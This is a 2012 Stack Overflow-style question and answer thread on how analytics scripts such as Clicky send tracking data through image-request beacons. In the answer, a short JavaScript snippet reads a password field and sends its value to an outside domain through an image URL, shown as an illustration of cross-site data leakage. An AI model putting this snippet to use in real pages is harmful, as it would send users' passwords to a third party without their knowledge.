4

Anyone knows how Google analytics or Clicky works?

I'm stuck at the fact that I searched the entire http://static.getclicky.com/js file and didn't find any server requests in it. How does it send data without compromising its own security? Or else users could send false data by modifying the js.

Xpleria
  • 5,472
  • 5
  • 52
  • 66

1 Answers1

4

Images: these libraries use a trick where they encode all the tracking information they want, append it to the image URL, and "send" it by requesting the image. Server-side parsing of that image filename decodes the information.

Suppose you had a password field that you wanted to send from mydomain.com to somedomain.com:

<input type='password' id='p' />

This javascript could send the contents by violating cross-site limits:

var t = document.getElementById('p').value;
var i = document.createElement('img');
i.src = 'http://somedomain.com/imagescript.php?p=' + t;

Cross-site scripting limitations don't apply to images, and when you compose the image URL request in JavaScript, no browser or logic in the world can account for all possibilities. Suppose we're lucky that GA is ethical and doesn't snag form fields.

pp19dd
  • 3,625
  • 2
  • 16
  • 21
  • Wow that's a nice one. But what happens to i.src? Is it discarded? And if they had to fetch the data for example ip address of the user/browser info/referring url etc, is it done in the php file or by javascript? – Xpleria Jun 12 '12 at 13:22
  • Some of the information (browser agent, IP address, possibly referring URL) is gleaned passively from HTTP headers. Other information, like page title, is encoded in the image URL and server-side processing decodes it. – pp19dd Jun 12 '12 at 14:01
  • thanks a lot for the answer. But why so much of coding just to send a bunch of variables? I can't really figure out what it is but I guess data is encoded before it is sent to avoid fraudant entries. – Xpleria Jun 12 '12 at 14:11
  • There is nothing in the JS code that would prevent fraudulent entries. Most of the clicky code deals with specializations, such as distinctions between content types, and revenue goals. – pp19dd Jun 12 '12 at 14:35
  • 'and when you compose the image URL request in JavaScript, "no browser or logic in the world can account for all possibilities."' - what does this exactly mean? – Xpleria Jun 12 '12 at 17:09
  • Now I have a major doubt here. Since you're calling the php file (to get the image resource) you can do all the scripting in the php file. Why do it in the js? – Xpleria Jun 12 '12 at 17:43
  • Re: browser logic, I mean to say that standard browser safety devices don't apply to images. In other words, cross-site scripting (XSS) rules don't apply, which is why they're used. Modern JS-tracking is a two part process - client and server. Client is the browser, so, you need JavaScript to transmit the information over, and server side PHP does the analysis and data aggregation. Point is to be able to retrofit any complex page, site, framework etc and painlessly insert tracking. But to your point, yes, these things can be gamed from either end. – pp19dd Jun 12 '12 at 18:18